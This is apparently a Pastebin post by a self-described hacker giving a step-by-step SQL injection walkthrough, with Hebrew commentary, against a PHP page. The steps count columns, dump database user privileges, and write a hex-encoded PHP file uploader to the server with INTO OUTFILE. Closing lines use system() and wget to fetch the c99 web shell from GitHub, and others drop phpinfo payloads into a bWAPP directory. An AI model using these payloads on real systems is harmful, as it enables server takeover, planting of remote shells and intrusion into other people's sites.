Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <===============Hacker zurael sTz===============>
- =================twitter=============================
- https://twitter.com/zurael_stz
- =================facebook============================
- https://www.facebook.com/sTzisrael/
- =====================================================
- =================telegram============================
- https://telegram.me/joinchat/BL8GnT_yQscC-6gBMuCW_w
- =====================================================
- <===============Hacker zurael sTz===============>
- Upload Shell Throug Sql Query By zureal_sTz
- http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=79 ' : error sql
- ORDER BY
- http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=79 order by 10-- : Unknown column '10' in 'order clause'Query Fail
- http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=79 order by 9-- : Unknown column '9' in 'order clause'Query Fail
- http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=79 order by 8-- : new error
- http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=-79 union select 1,2,3,4,5,6,7,8--
- עכשיו נבדוק א מקבלים תשובה מהשרת
- http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=-79 union select 1,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),3,4,5,6,7,8--
- וכן קיבלנו תשובה מהשרת
- YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- ,'root'@'localhost' -> YES
- עכשיו לאתר קובץ
- זאת השגיאה
- F:\Lexus\indexPage\IndexOther.php
- נעשה ככה
- F:/Lexus/indexPage/name.txt
- F:/Lexus/indexPage/name.php
- http://site.com/indexpage/IndexOther.php?cat=VAT - Assam&CatId=-79 union select 1,0x3c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d7d3f3e,3,4,5,6,7,8 INTO OUTFILE "F:/Lexus/indexPage/name.php"--
- <?system ('wget https://raw.githubusercontent.com/tennc/webshell/master/php/PHPshell/c99shell/c99shell.php -o script.php');?>
- "><? system ('wget https://raw.githubusercontent.com/tennc/webshell/master/php/PHPshell/c99shell/c99shell.php -O script.php');?>
- id=ddos) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>’ into outfile ‘/var/www/html/bWAPP/image/phpinfo.php’%23
- id=ddos) into outfile ‘/var/www/html/bWAPP/image/phpinfo’ fields terminated by ‘<? phpinfo(); ?>’%23
- #zurael_sTz
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement